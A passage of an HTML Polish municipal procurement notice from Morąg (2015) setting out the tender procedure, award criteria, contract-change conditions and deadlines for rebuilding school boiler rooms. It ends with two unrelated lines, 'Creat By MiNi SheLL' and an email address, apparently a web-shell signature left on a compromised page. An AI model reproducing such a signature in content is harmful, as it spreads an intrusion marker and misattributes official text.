innym podmiotem, 5) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział 
przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień treści zawartej umowy w sprawie 
zamówienia  publicznego  w  stosunku  do  treści  oferty  dotyczącej  przedmiotu  niniejszego 
zamówienia publicznego. Szczegółowy opis  warunków dokonania takich zmian znajduje 
się  we  wzorze  umowy  stanowiącym  Załącznik  nr  10  do  SIWZ  -  w  tym  możliwości  i 
warunki  wprowadzenia  zmian  umowy:  -  zmiany  wynikające  ze  zmiany  przepisów 
prawnych  istotnych  dla  realizacji  przedmiotu  umowy,  -  zmiany  wartości  wynagrodzenia 
Wykonawcy  będzie  możliwa  w  przypadku  zmiany  stawki  podatku  VAT  lub  akcyzy  dla 
dostaw objętych przedmiotem zamówienia w trakcie jego realizacji, - zmiany wynikające z 
wystąpienia zdarzeń obiektywnie niezależnych od Zamawiającego lub Wykonawcy, które 
zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających 
z umowy, których Zamawiający lub Wykonawca nie mógł przewidzieć i którym nie mógł 
zapobiec ani ich przezwyciężyć i im przeciwdziałać.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 09:00, miejsce: Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.  Wykonawcy  mogą  wspólnie  ubiegać  się  o  udzielenie 
zamówienia.  W  takim  przypadku  Wykonawcy  ustanawiają  pełnomocnika  do 
reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  reprezentowania  w 
postępowaniu  i  zawarcia  umowy  w  sprawie  zamówienia  publicznego.  Do  oferty  należy 
dołączyć  pełnomocnictwo,  które  powinno  dokładnie  określać  zakres  umocowania. 
Zamawiający  będzie  żądać  przed  zawarciem  umowy  w  sprawie  przedmiotowego 
zamówienia  publicznego,  umowy  regulującej  współpracę  Wykonawców,  którzy  złożyli 
wspólnie ofertę wybraną jako najkorzystniejszą. Wszelka korespondencja oraz późniejsze 
rozliczenia  dokonywane  będą  wyłącznie  z  pełnomocnikiem  (liderem  wykonawcy).  2. 
Termin  realizacji  zamówienia:  48  miesięcy  liczonych  od  daty  przekazania  pomieszczeń 
każdej  z  przedmiotowych  Kotłowni  na  podstawie  podpisanych  przez  obie  strony 
protokołów przekazania. Protokół zostanie sporządzony przy udziale Zamawiającego lub 
osób  przez  niego  wskazanych  i  dyrektora  danej  szkoły.  3.  Przebudowa  każdej  z 
przedmiotowych  kotłowni:  łącznie  w  ciągu  60  dni  liczonych  od  daty  przekazania 
pomieszczeń  każdej  z  przedmiotowych  Kotłowni  na  podstawie  podpisanych  przez  obie 
strony  protokołów  przekazania.  Protokół  zostanie  sporządzony  przy  udziale 
Zamawiającego lub osób przez niego wskazanych i dyrektora danej szkoły..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com